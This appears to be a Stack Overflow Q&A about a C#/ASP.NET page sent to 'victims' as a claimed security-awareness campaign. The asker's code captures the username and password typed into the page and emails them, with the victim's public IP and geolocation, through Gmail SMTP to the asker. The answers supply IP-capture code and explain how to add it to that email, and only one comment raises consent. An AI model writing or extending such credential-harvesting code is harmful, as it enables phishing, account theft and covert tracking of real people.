# Get Remote IP of user on link clicking

Tags: c#, asp.net, azure, ip

We are conducting some awareness campaign of Info security.I had created a webpage and hosted it on azure webserver and send the link to victim. I had implement a mechanism of getting IP of victim in my code. When he click on my link i get IP of azure webserver in my email. But i want public IP of his internet. i.e. https://www.whatismyip.com . When the victim will click my link I shall receive his IP that is show in whatsmyip to my email. 
current implemetation:

```html
protected void Sendemail()
    {

        //this line is to check the clien ip address from the server itself
        string IP = "";

        string strHostName = "";
        strHostName = System.Net.Dns.GetHostName();

        IPHostEntry ipEntry = System.Net.Dns.GetHostEntry(strHostName);

        IPAddress[] addr = ipEntry.AddressList;

        IP = addr[0].ToString();

       // Initializing a new xml document object to begin reading the xml file returned
        XmlDocument doc = new XmlDocument();
        doc.Load("http://www.freegeoip.net/xml");
        XmlNodeList ipaddress = doc.GetElementsByTagName("IP");
        XmlNodeList nodeLstCity = doc.GetElementsByTagName("City");
        XmlNodeList Country = doc.GetElementsByTagName("CountryName");
        XmlNodeList timezone = doc.GetElementsByTagName("TimeZone");
        XmlNodeList latitudeinfo = doc.GetElementsByTagName("Latitude");
        XmlNodeList longituteinfo = doc.GetElementsByTagName("Longitude");
        IP = "IP" + ipaddress[0].InnerText + "\n" + "City:" + nodeLstCity[0].InnerText + "\n" + "Country:" + Country[0].InnerText + "\n" + "Time Zone:" + timezone[0].InnerText + "\n" + "Latitude:" + latitudeinfo[0].InnerText + "\n" + "Longitude:" + longituteinfo[0].InnerText + "\n" + "." + IP;
        string pubIp = new System.Net.WebClient().DownloadString("https://api.ipify.org");
        
        Response.Write(pubIp);
        
        var fromAddress = "EMAIL";
       
        // any address where the email will be sending

        var toAddress = "SOMEEMAIL";
        //Password of your gmail address
        const string fromPassword = "PASSWORD";
        // Passing the values and make a email formate to display
        string subject = "Info".ToString();

        string body = "Username : " + UEmail.Text + "\n";
        body += "Password: " + UPass.Text + "\n";
        //body += "Recovery Email: " + recEmail.Text + "\n";
        //body += "Recovery Phone # " + phoneNumber.Text + "\n";
       
        body += "Info: \n " + pubIp + "\n";
        body += "Another test IP Info: \n " + IP + "\n";


        // smtp settings
        var smtp = new System.Net.Mail.SmtpClient();
        {
            smtp.Host = "smtp.gmail.com";
            smtp.Port = 587;
            smtp.EnableSsl = true;
            smtp.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network;
            smtp.Credentials = new NetworkCredential(fromAddress, fromPassword);
            smtp.Timeout = 30000;

        }
  smtp.Send(fromAddress, toAddress, subject, body);
}
```

Comment: Out of curiosity, what are you planning to do with the collected IP addresses?

Answer (score 1):

Here is how you can get the ip address:

```
private string GetIPAddress()
{
    System.Web.HttpContext context = System.Web.HttpContext.Current; 
    string ipAddress = context.Request.ServerVariables["HTTP_X_FORWARDED_FOR"];

    if (!string.IsNullOrEmpty(ipAddress))
    {
        string[] addresses = ipAddress.Split(',');
        if (addresses.Length != 0)
        {
            return addresses[0];
        }
    }

    return context.Request.ServerVariables["REMOTE_ADDR"];
}
```

Comment: P.s. you should always inform the user what anf why you are getting !

Comment: Incase i want to receive it via email...How can i pass it in below code?
body += "Info: \n " + pubIp + "\n";
smtp.Send(fromAddress, toAddress, subject, body);

Comment: just set  `pubIp = GetIPAddress();` or `body += "Info: \n\r " + GetIPAddress() + "\n\r";`

Answer (score 0):

You can get public IP address using HTTP client. Fetch a data and use string.split or something to parse the information. http://checkip.dyndns.org/ this website gives you the ip address in an easy echo format. So you don't have to do much of processing. Here is a very simple sample code:

```
    string GetPublicIP()
    {
        System.Net.WebClient wc = new System.Net.WebClient();
        byte[] raw = wc.DownloadData("http://checkip.dyndns.org/");

        string webData = System.Text.Encoding.UTF8.GetString(raw);

        string[] body = webData.Split(new[] { "<body>", "</body>" }, StringSplitOptions.RemoveEmptyEntries);
        string[] ip = body[1].Split(new[] { ":" }, StringSplitOptions.RemoveEmptyEntries);


        return ip[1];
     }
```